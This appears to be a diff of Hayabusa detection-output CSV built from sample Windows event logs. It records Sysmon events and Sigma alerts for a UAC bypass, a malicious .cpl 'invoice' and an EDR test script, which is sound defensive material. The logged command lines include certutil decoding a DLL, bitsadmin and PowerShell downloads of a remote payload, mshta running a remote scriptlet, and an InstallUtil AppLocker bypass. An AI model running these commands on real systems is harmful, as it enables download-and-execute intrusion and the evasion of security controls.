+2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235cdd | PID: 7128 | PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\UACBypass.exe | Tgt Process: C:\Windows \System32\winSAT.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6632 | Src PGUID: 747F3D96-D39D-5D3C-0000-001026F55500 | Tgt PID: 7128 | Tgt PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6820 324 0000022557280720 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4028 | PGUID: 747F3D96-D39E-5D3C-0000-0010EF395600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235bee | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.938 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:43.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Image: C:\Windows \System32\WINMM.dll | Process: C:\Windows \System32\winSAT.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-30 06:11:11.156 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Invoice@0582.cpl | Process: C:\Windows\Explorer.EXE | PID: 4600 | PGUID: 747F3D96-6056-5D3F-0000-0010C9EF4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x4131b5 | PID: 4996 | PGUID: 747F3D96-60F5-5D3F-0000-0010A7B65500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4356 | PGUID: 747F3D96-60F5-5D3F-0000-0010D1CF5500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4884 | PGUID: 747F3D96-60F5-5D3F-0000-0010A8D75500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt | Process: C:\Windows\SysWOW64\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 6160 | PGUID: 747F3D96-60F7-5D3F-0000-00106F2F5600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6336 362 00000298E04230D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6424 | PGUID: 747F3D96-6607-5D3F-0000-0010B3818500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x413182 | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3184 | PGUID: 747F3D96-660A-5D3F-0000-0010B9E08500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2576 | PGUID: 747F3D96-660A-5D3F-0000-001048E58500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | LID: 0x413182 | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\AllTheThings.dll | Process: C:\Windows\system32\certutil.exe | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-660F-5D3F-0000-00109B328600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2948 | PGUID: 747F3D96-660F-5D3F-0000-001055378600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | LID: 0x413182 | PID: 3896 | PGUID: 747F3D96-660F-5D3F-0000-00100F4F8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | LID: 0x413182 | PID: 6720 | PGUID: 747F3D96-660F-5D3F-0000-00106B508600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Evas | Persis,Suspicious Bitsadmin Job via PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3756 | PGUID: 747F3D96-660F-5D3F-0000-00104D5B8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 108 | PGUID: 747F3D96-6614-5D3F-0000-001093CE8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7156 | PGUID: 747F3D96-6614-5D3F-0000-00104ED38600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | LID: 0x413182 | PID: 5696 | PGUID: 747F3D96-6614-5D3F-0000-0010BFD98600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5116 | PGUID: 747F3D96-6619-5D3F-0000-0010FDE78600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-6619-5D3F-0000-0010BEE98600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 776 | PGUID: 747F3D96-661E-5D3F-0000-0010A3148700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6756 | PGUID: 747F3D96-661E-5D3F-0000-00103F168700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas,Mshta JavaScript Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 404 | PGUID: 747F3D96-6620-5D3F-0000-0010C7798700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49826 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49827 (MSEDGEWIN10.home) | Dst: 93.184.220.29:80 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
